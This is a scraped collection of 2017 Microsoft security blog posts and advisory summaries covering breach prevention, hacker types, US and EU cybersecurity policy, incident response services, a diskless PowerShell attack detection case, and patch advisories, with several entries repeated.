Simple steps to help prevent data breaches at your company

Every company has cybersecurity risks and needs to be aware of them, but understanding your company’s risk profile is just the beginning.

Watch this Modern Workplace episode “Cyber Intelligence: Help Prevent a Breach” to get advice on how to best approach cybersecurity at your company from two Chief Information Security Officers (CISO) – Vanessa Pegueros, CISO at DocuSign, and Mike Convertino, CISO at F5 Networks. Learn how these seasoned security executives make decisions on security spending and how they justify security investments to skeptical executives who may not have ever experienced a security breach.

Knowing what you need to protect is a key component of your security strategy. As Convertino explains, “The value proposition of the company needs to be the thing that you base your protections and recommendations on.” When you have a clear goal for security, it becomes easier to demonstrate the value of your security investments in tools and talent.

You’ll also see a preview of the protection available from Office 365 Threat Intelligence, which lets you monitor and protect against risks before they hit your organization. Using Microsoft’s global presence to provide insight into real-time security threats, Office 365 Threat Intelligence enables you to quickly and effectively set up alerts, dynamic policies, and security solutions for potential threats.

Watch the Modern Workplace episode to learn more.

 

Categories: Uncategorized Tags:

7 types of highly effective hackers (and what to do about them)

Would you know what to do if you drew the attention of a hacktivist group? Knowing that damages from a hacktivist attack are typically minor is no relief, as a breach will surely damage your reputation. However, knowing about the different types of hackers, what motivates them, and the tools and techniques they use, can help better prepare your organization to protect against them.

Attacks on organizations around the world are on the rise. Millions of dollars of intellectual property are at risk, as well as the threat of lost productivity. Threats now come from a wide range of sources including:

  • Script Kiddies who exploit existing code to hack for fun
  • Hacking Groups that work together to attack governments and companies
  • Hactivists who use hacking skills to promote an agenda
  • Black Hat Professionals who make a living from hacking
  • Organized Criminal Gangs that steal data to make money
  • Nation States that do political and economic espionage
  • Cyberweapons Dealers who sell to exploit to other hackers

Learn more about the 7 different hackers and get recommendations on how you can better prepare your organization against their potential threats in this free eBook: 7 Types of Highly Effective Hackers.

 

Categories: Uncategorized Tags:

More than just an ocean separates American and European approaches to cybersecurity

May 17th, 2017 No comments

The recent revision of the National Standards and Technology Institute’s (NIST) Cybersecurity Framework and the publication of European Network and Security Agency’s (ENISA) proposals on implementation of the Network and Information Security (NIS) Directive have made me pause and ponder the progress made (or indeed not) in securing our critical infrastructures since they were both introduced. I was also struck by how much the differences in political culture affect policy outcomes, even when these are largely supported by the broad ecosystems they seek to regulate and/or influence.

The starting point was strikingly similar for both economic powers: the Directive and the Framework seek to improve cybersecurity of critical infrastructures. They came out at around the same time in early 2013, when the European Commission first introduced the Directive and when Obama signed the Executive Order that set out the process that ultimately resulted in the Cybersecurity Framework.

Given the considerable differences in the US and the EU political, legislative and executive “machines” it is no surprise that, even with these common starting points, the two have followed very different paths. The Framework is undergoing its first major revision in 3 years based on changes in threat and experiences of global adopters. The Directive is now only beginning the implementation phase in the  EU member states.

The NIST’s creation of the Framework has been rightly held up as a successful example of public-private partnership. It used an open, collaborative and iterative development process to harness the expertise and experience of cyber and non-cyber stakeholders, hosting numerous open workshops and consulting widely, and not just within the US itself. The result was a Framework that is now being referenced around the world, by businesses and governments and it is being considered as a starting point for ISO 27103.

On the other hand, the processes of aligning 28 different sets of national cybersecurity agendas, and of securing a common view from a European Parliament that has somewhere between four and six major party groups, took considerably longer than the gestation of the Framework. It was a monumental effort and investment on the part of Europe. There were working groups and workshops too, but perhaps because of the efforts to coordinate the necessary agreements at the “top” the resulting Directive lacked some of the obvious “bottom-up” characteristics of the Framework. But the benefit of the Directive, creates durable institutions in EU member states, coordination processes, and security baselines. As a result, the it is likely to result in a very different return on investment than the Framework.

But this should not just be a story of different approaches to cybersecurity policy. The EU approach to building institutions and setting capabilities requirements, if implemented and evolved, will help provide a layer of coordination and security that did not exist. The Framework’s voluntary nature and global adoption is better at preparing enterprises – public and private – for improving risk management measures.

These are substantial differences, from the perspective of both businesses and regulators in these two approaches. However, in the end they may complement each other more than we see today. For example, several EU member states already reference the Framework within their approaches to cybersecurity as they seek to leverage implementing terminology and standards. Looking forward, therefore, it is possible that the two approaches could converge in practical ways. Parts of the Framework might evolve into an international standard, as referenced above, one that can be utilized by a great number of countries. Equally, the implementation of the Directive at EU member state level, and the identification of reference standards, could establish a model that other regions might follow.

Cybercriminals and cyberattacks will inevitably be encouraged and enabled by serious divergence in approaches to cybersecurity, wherever in the world these occur. As such, it seems essential that steps are taken on both sides of the Atlantic to ensure closer harmonization, both to improve the situation of the US and the EU and to set an example to the rest of the world.

Categories: Uncategorized Tags:

Announcing new Adversary Detection and Compromised Recovery services

This post is authored by Berk Veral, Senior Marketing Communication Manager, Enterprise Cybersecurity Group. 

Perhaps one of the best-kept secrets within Microsoft cybersecurity services is the Global Incident Response and Recovery team.  We affectionately call them the “GIRR” team for short. Not many people know about the team but, for those whom they have helped to combat cyber criminals, they are indispensable – a trusted partner when the worst cybercrimes happen.

The GIRR team is comprised of elite cybersecurity professionals who are experts in handling critical incidents and helping our customers during a crisis when a compromise or a breach is suspected. On an ongoing basis, the team works around the clock and around the globe, demonstrating grit, fortitude and steadfast dedication to Microsoft customers in need.

The team is expanding and now offers two new services for our customers: Persistent Adversary Detection Services – Cloud Enabled (PADS-CE) and Compromise Recovery (CR). These are two very different standalone services designed to help customers under specific circumstances.

Cloud-Based Persistent Adversary Detection Service

PADS-CE is a cybersecurity service for customers who want to understand their exposure to the risks posed by today’s targeted attacks from determined human adversaries and sophisticated criminal organizations. However, unlike a traditional PADS engagement where all resources would be deployed onsite at the customer’s location, PADS-CE leverages a secure Azure workspace for collaboration, allowing remote team members to participate in the engagement. PADS-CE provides the ability to leverage the unique skill sets of seasoned Incident Responders worldwide, culminating in a richer engagement experience and output for our customers.

PADS-CE is ideal for enterprise customers primarily running Windows endpoints who would like to validate that they have not been victim to a target attack. It is a proactive, discrete service that is, in effect, an incident response prior to an actual emergency.

Microsoft will provide information regarding the customer’s exposure to targeted attacks via PADS-CE at a lower price point by leveraging Azure and a team of remote resources. PADS-CE leverages telemetry from Microsoft’s vast, global sensor network, and is able to correlate PADS-CE findings against threat intelligence worldwide. The team leverages proprietary scanners (that do not remain on the network), to detect the presence of implants, backdoors, and similar unauthorized malc0de. Through forensic analysis and reverse engineering of any implants found, the team can assess customers’ current exposure to the threats posed by targeted attacks.

Compromised Recovery

Microsoft Compromise Recovery (CR) service is a cybersecurity offering designed to restore a customer’s secure business operations after a compromise. The service runs in parallel with any ongoing incident response investigation or soon after its completion, whether performed by Microsoft or a 3rd party.

It consists of four principal components:

  1. Scoping of the compromise
  2. Installing critical hardening policies
  3. Deploying and tuning tactical monitoring solutions
  4. Coordinating an attacker eviction event

CR is ideal for enterprise customers primarily running Windows endpoints who have confirmed malicious activity in their environment. Most likely, they have already engaged Microsoft or a 3rd party to complete an incident response investigation.

CR will help customers get their business operations back up and running by remediating their exposure to risks after an incident response investigation. CR will remove identified malicious activity from their network, harden against further compromise and monitor for indicators of compromise based on the current attack.

In addition to restoring a customer’s secure business operations and providing information regarding the customer’s remaining risk exposure, CR will offer suggestions for strategic initiatives to improve security posture. Microsoft leverages best in class monitoring solutions – Advanced Threat Analytics (ATA) and Operations Management Suite (OMS) – to monitor systems after a compromise. Compromise Recovery is based on years of industry expertise and best practices with incident response, based on the Microsoft GIRR team successfully leading countless recoveries around the globe.

Trusted Security Partner Every Step of the Way

These two offerings bring Microsoft customers expanded capabilities in cybersecurity, and provide the Microsoft Global Incident Response and Recovery team another tool to ensure Microsoft can be counted on by every enterprise CISO as their trusted security partner when it comes to detecting and responding to incidents, as well as getting business operations back up and running in the wake of an incident.

Please visit Sharing Microsoft learnings from major cybersecurity incidents to learn more about the Microsoft Global Incident Response and Recovery team and how they can help your organization.

Categories: Uncategorized Tags:

How the Asia-Pacific region is advancing cybersecurity

This post is authored by Angela McKay, Director of Cybersecurity Policy.

Earlier this year, my team and I had the great privilege and pleasure of spending several days in Japan, participating in the Information Technology Promotion Agency (IPA) Symposium. We also met with industry colleagues to discuss global cybersecurity trends and opportunities to engage in public policy, and met with Japanese government partners to examine the question of cloud security.

Even just a few days in Tokyo demonstrated that the focus on the importance of cybersecurity is growing in Japan and across the Asia-Pacific region, within both government and industry. The understanding that concrete action is now needed is also growing.

Japan is well positioned for regional leadership in this space. The size of the IPA symposium, the seniority of both attendees and speakers, and the maturity of the conversation underscored this. In Japan, cybersecurity is clearly evolving from an issue of interest solely to technically inclined geeks, to one that is a major concern for the government, businesses, and consumers. The policy debate is shifting from conceptual discussions to more practical consideration, such as the development of security practices and requirements, particularly for critical infrastructure and government.

What is particularly praise-worthy and unique in the Japanese approach, is the iterative way the government is tackling challenges in this space, dynamically reprioritizing and emphasizing different areas based on changes in technology and risks, and the effectiveness of its various efforts. For example, while the Basic Cybersecurity Law and National Cybersecurity Strategy were adopted more than two years ago, the government has since repeatedly consulted and reexamined areas where outcomes have proven to be difficult to attain, for example cross-government cooperation on cybersecurity.

Japan is not alone in grappling with how to govern cybersecurity; however, it is one of the few governments which understands that cybersecurity is not an area that can be looked at once and then ignored for the next decade. It is using the impetus behind the 2020 Olympics and Paralympics to increase cyber resilience, examining how new technologies, such as cloud computing, can increase security of the government, critical infrastructures, and for the Internet of Things (IoT). It actively seeks to assess progress with 2020 in mind, for example by considering whether and how cybersecurity information sharing is increasing the security of the Games and key sectors of the economy. It does this not just through forming ISACs but by partnering with the private sector to ensure that 1) sharing is focused on risk management outcomes and 2) cultural and structural obstacles that might be particular to Japan are understood and addressed.

A similar approach is being pursued when it comes to encouraging critical infrastructure sectors to adopt risk management practices. The government has been consulting on its guide, as they are realizing that while the voluntary nature of their cybersecurity efforts remains pivotal, many of the private sector enterprises are looking for more specific guidance on how to move forward in this area. In our response, Microsoft therefore suggested developing a model similar to the one put forward by NIST with its Cybersecurity Framework, where the government and private sector collaborated to develop guidance that built on proven standards and best practices within an overarching framework that is meaningful to executives.

Beyond this pragmatic approach, Japan also continues to drive thought leadership in important new areas. Japan recently announced a new partnership with Germany to establish an Internet of Things (IoT) standard for commercial and industrial organizations, as well as proposals on how to best secure this new area of innovation. This has given Japan a unique opportunity, perhaps even a responsibility as a genuine world leader in this space, to start articulating the security concerns that should be addressed by players in IoT services (with a link to our NTIA response for more detail). Their solutions, including the use of incentives to drive behaviors, will be looked at by other governments, not just regionally but across the globe.

In the era of digitalization, every government and organization should look to and incorporate and codify effective initiatives and programs, such as Japan’s, into their policies and operations. Microsoft is excited to work alongside Japan and other Asia-Pacific countries to build a global culture of strong cybersecurity principles that create a trustworthy high-tech world. It will require the leadership of countries such as Japan and the commitment of industry leaders such as ourselves to ensure the safety and security in the digital space.

Categories: Uncategorized Tags:

4022345 – Identifying and correcting failure of Windows Update client to receive updates – Version: 1.3

Severity Rating: Critical
Revision Note: V1.3 (May 12, 2017): Updated FAQ to clarify the update that needs to be installed: “the current cumulative update”. This is an informational change only.
Summary: Microsoft is releasing this security advisory to provide information related to an uncommon deployment scenario in which the Windows Update Client may not properly scan for, or download, updates.

Categories: Uncategorized Tags:

4022345 – Identifying and correcting failure of Windows Update client to receive updates – Version: 1.3

Severity Rating: Critical
Revision Note: V1.3 (May 12, 2017): Updated FAQ to clarify the update that needs to be installed: “the current cumulative update”. This is an informational change only.
Summary: Microsoft is releasing this security advisory to provide information related to an uncommon deployment scenario in which the Windows Update Client may not properly scan for, or download, updates.

Categories: Uncategorized Tags:

4021279 – Vulnerabilities in .NET Core, ASP.NET Core Could Allow Elevation of Privilege – Version: 1.1

Revision Note: V1.1 (May 10, 2017): Advisory revised to include a table of issue CVEs and their descriptions. This is an informational change only.
Summary: Microsoft is releasing this security advisory to provide information about vulnerabilities in the public .NET Core and ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications correctly.

Categories: Uncategorized Tags:

4021279 – Vulnerabilities in .NET Core, ASP.NET Core Could Allow Elevation of Privilege – Version: 1.1

Revision Note: V1.1 (May 10, 2017): Advisory revised to include a table of issue CVEs and their descriptions. This is an informational change only.
Summary: Microsoft is releasing this security advisory to provide information about vulnerabilities in the public .NET Core and ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications correctly.

Categories: Uncategorized Tags:

Use Enterprise Threat Detection to find “invisible” cyberattacks

This post is authored by Roberto Bamberger, Principal Consultant, Enterprise Cybersecurity Group.

Amongst the plethora of stories about cyberattacks in the news, multiple recent articles have been published describing the more difficult to detect cyberattacks which leverage normal tools, already present in an enterprise, to achieve their mission. SecureList calls the techniques used in these situations “invisible” and “diskless”. This post describes the challenges your organization can face in detecting such attacks with typical detection techniques and what you can do to protect against them.

To begin, consider that many of these attacks use native capabilities in Microsoft Windows such as PowerShell in order to avoid having to store files on disks which are routinely scanned and could be discovered by antivirus products. That is why Microsoft has developed multiple capabilities that can detect such attacks including:

  1. Microsoft Enterprise Threat Detection
  2. Windows Defender Advanced Threat Protection
  3. Microsoft Advanced Threat Analytics

Here is a summary of why these can help you.

The Microsoft Enterprise Threat Detection (ETD) service, is a managed detection service, able to detect invisible/diskless attacks and provide enterprises with actionable intelligence to effectively respond to these threats. Windows 10 also includes Windows Defender Advanced Threat Protection (Windows Defender ATP). This feature along with Antimalware Scan Interface (AMSI) and Microsoft Advanced Threat Analytics (ATA) provide you with user and entity behavioral analysis capabilities which can be effective in detecting such threats and their associated malicious behaviors.

Enterprise Threat Detection can consume a variety of data sources:

  • Windows error reports can contain memory of a faulting process, registry keys, files, and the results of WMI queries
  • Telemetry sent from the organization’s IP egress ranges in the form of the Microsoft Active Protection System (MAPS)
  • Data received by the Microsoft Digital Crimes Unit as part of its botnet disruption and eradication efforts
  • Using ATA and Windows Defender ATP on Windows 10 monitors those signals and provides advanced detection and response data

To illustrate leveraging the Windows Error Reporting data for this type of advanced analysis, the Microsoft ETD team recently received an event from a customer environment, which was due to a crash in PowerShell.

In this case, PowerShell was executing an object stored in a base64 encoded string. Automated analysis of the memory of the PowerShell process indicated contained code consistent with malicious code in the form of shellcode:

In this case, further analysis revealed that the code was being reflectively loaded into the PowerShell process attempts to download additional code from an external source. Using advanced analysis tools, ETD analysts determined the name of the server and file that was being requested.

Analysis of the payload returned from this internet resource revealed that the attacker was establishing a reverse shell and loading the metasploit meterpreter, a popular penetration testing tool.  However, the meterpreter code was never written as a file to disk, therefore it was diskless, loaded only from an external site, making detection within the customer environment difficult.

Microsoft ETD analysts quickly analyzed the event, determined it was malicious, and informed the organization of the nature of the attack, providing them with actionable intelligence. This specific actionable intelligence included indicators of attack that can be used to analyze additional data such as proxy logs, to determine if this activity was still ongoing and/or impacting other machines in their environment.

In conclusion, organizations need to be aware of this type of malicious behavior becoming more prevalent in cybercrime. Microsoft has many insights and tools for enterprises to help keep their environments protected. For information about Enterprise Threat Detection services, contact your Microsoft Account Team or email mtds@microsoft.com.

Categories: Uncategorized Tags:

MS17-013 – Critical: Security Update for Microsoft Graphics Component (4013075) – Version: 3.0

Severity Rating: Critical
Revision Note: V3.0 (May 9, 2017): Microsoft has re-released security update 4017018 for affected editions of Windows Server 2008. The re-release has been re-classified as a security update. Microsoft recommends that customers should install update 4017018 to be fully protected from CVE-2017-0038. Customers who have already installed the update do not need to take any further action. In addition, this security update correction also applies to Windows Server 2008 for Itanium-based Systems.
Summary: This security update resolves vulnerabilities in Microsoft Windows, Microsoft Office, Skype for Business, Silverlight and Microsoft Lync. The most serious of these vulnerabilities could allow remote code execution if a user either visits a specially crafted website or opens a specially crafted document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Categories: Uncategorized Tags:

MS17-MAR – Microsoft Security Bulletin Summary for March 2017 – Version: 3.0

Categories: Uncategorized Tags:

4010323 – Deprecation of SHA-1 for SSL/TLS Certificates in Microsoft Edge and Internet Explorer 11 – Version: 1.0

Revision Note: V1.0 (May 9, 2017): Advisory published.
Summary: Beginning May 9, 2017, Microsoft released updates to Microsoft Edge and Internet Explorer 11 to block sites that are protected with a SHA-1 certificate from loading and displays an invalid certificate warning. This change will only impact SHA-1 certificates that chain to a Microsoft Trusted Root CA where the end-entity certificate or the issuing intermediate uses SHA-1. Manually-installed enterprise or self-signed SHA-1 certificates will not be impacted, although we recommend that all customers quickly migrate to SHA-2. For more information, please see Windows Enforcement of SHA1 Certificates.

Categories: Uncategorized Tags:

4022345 – Identifying and correcting failure of Windows Update client to receive updates – Version: 1.0

Severity Rating: Critical
Revision Note: V1.0 (May 9, 2017): Advisory published.
Summary: Microsoft is releasing this security advisory to provide information related to an uncommon deployment scenario in which the Windows Update Client may not properly scan for, or download, updates.

Categories: Uncategorized Tags:

4021279 – Vulnerabilities in .NET Core, ASP.NET Core Could Allow Elevation of Privilege – Version: 1.0

Revision Note: V1.0 (May 9, 2017): Advisory published.
Summary: Microsoft is releasing this security advisory to provide information about vulnerabilities in the public .NET Core and ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications correctly.

Categories: Uncategorized Tags:

MS17-013 – Critical: Security Update for Microsoft Graphics Component (4013075) – Version: 3.0

Severity Rating: Critical
Revision Note: V3.0 (May 9, 2017): Microsoft has re-released security update 4017018 for affected editions of Windows Server 2008. The re-release has been re-classified as a security update. Microsoft recommends that customers should install update 4017018 to be fully protected from CVE-2017-0038. Customers who have already installed the update do not need to take any further action. In addition, this security update correction also applies to Windows Server 2008 for Itanium-based Systems.
Summary: This security update resolves vulnerabilities in Microsoft Windows, Microsoft Office, Skype for Business, Silverlight and Microsoft Lync. The most serious of these vulnerabilities could allow remote code execution if a user either visits a specially crafted website or opens a specially crafted document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Categories: Uncategorized Tags:

MS17-MAR – Microsoft Security Bulletin Summary for March 2017 – Version: 3.0

Categories: Uncategorized Tags:

4010323 – Deprecation of SHA-1 for SSL/TLS Certificates in Microsoft Edge and Internet Explorer 11 – Version: 1.0

Revision Note: V1.0 (May 9, 2017): Advisory published.
Summary: Beginning May 9, 2017, Microsoft released updates to Microsoft Edge and Internet Explorer 11 to block sites that are protected with a SHA-1 certificate from loading and displays an invalid certificate warning. This change will only impact SHA-1 certificates that chain to a Microsoft Trusted Root CA where the end-entity certificate or the issuing intermediate uses SHA-1. Manually-installed enterprise or self-signed SHA-1 certificates will not be impacted, although we recommend that all customers quickly migrate to SHA-2. For more information, please see Windows Enforcement of SHA1 Certificates.

Categories: Uncategorized Tags:

4022345 – Identifying and correcting failure of Windows Update client to receive updates – Version: 1.0

Severity Rating: Critical
Revision Note: V1.0 (May 9, 2017): Advisory published.
Summary: Microsoft is releasing this security advisory to provide information related to an uncommon deployment scenario in which the Windows Update Client may not properly scan for, or download, updates.

Categories: Uncategorized Tags:

4021279 – Vulnerabilities in .NET Core, ASP.NET Core Could Allow Elevation of Privilege – Version: 1.0

Revision Note: V1.0 (May 9, 2017): Advisory published.
Summary: Microsoft is releasing this security advisory to provide information about vulnerabilities in the public .NET Core and ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications correctly.

Categories: Uncategorized Tags: